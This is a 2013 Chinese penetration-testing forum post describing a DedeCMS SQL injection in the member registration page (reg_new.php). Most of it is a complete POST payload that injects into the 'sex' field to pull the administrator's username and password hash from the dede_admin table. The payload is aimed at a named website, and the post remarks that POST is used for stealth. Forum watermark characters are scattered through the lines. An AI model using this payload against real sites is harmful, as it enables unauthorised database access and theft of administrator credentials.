中国网络渗透测试联盟

标题: 织梦SQL注入漏洞再利用 [打印本页]
作者: admin    时间: 2013-1-19 08:25
标题: 织梦SQL注入漏洞再利用
漏洞类型: SQL注射漏洞
/ u# _" N( L% N/ `+ T- V简要描述:9 V3 I9 b9 ~, V* U& o" ]5 D
  c+ x. `% \/ `- g/ t: k1 v0 _
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.( e  j8 I% h. X
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
0 A) X! H9 |3 ^/ [( ]详细说明:跟这个漏洞& z+ h, y' Z3 g. W0 S* F: L4 U! Q

6 p! d. h9 [/ ^8 k2 \5 D4 W' aWooYun: Dedecms SQL注射导致审核机制绕过漏洞
. K( M2 f7 V' B4 M1 n是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
) j' ~# w& m- J2 ?# O) W. k" YPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
  G4 B7 c# T1 E
: A7 `% L' W0 q$ s. _4 Lwww.political-security.com/member/reg_new.php2 }1 J+ p8 g# y( g! K* N
- h0 d8 B$ `% I0 R
POST# a& x9 ^* M) [; A  u. \$ p
0 \# S- q8 ^: [& L) L
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&) I  z0 I+ H8 D! E$ h
userid=c4rp3nt3r&uname=c4rp3nt3r4 h0 {6 E+ W1 v' F
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
- `4 Z6 \  B& _# _, K! w2 T&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,$ {; ^' v5 T8 g) H; e8 M! ?# {: L
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');& N, x2 U0 n' b! {  K0 p3 C, v
%00&vdcode=glos&agree=



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2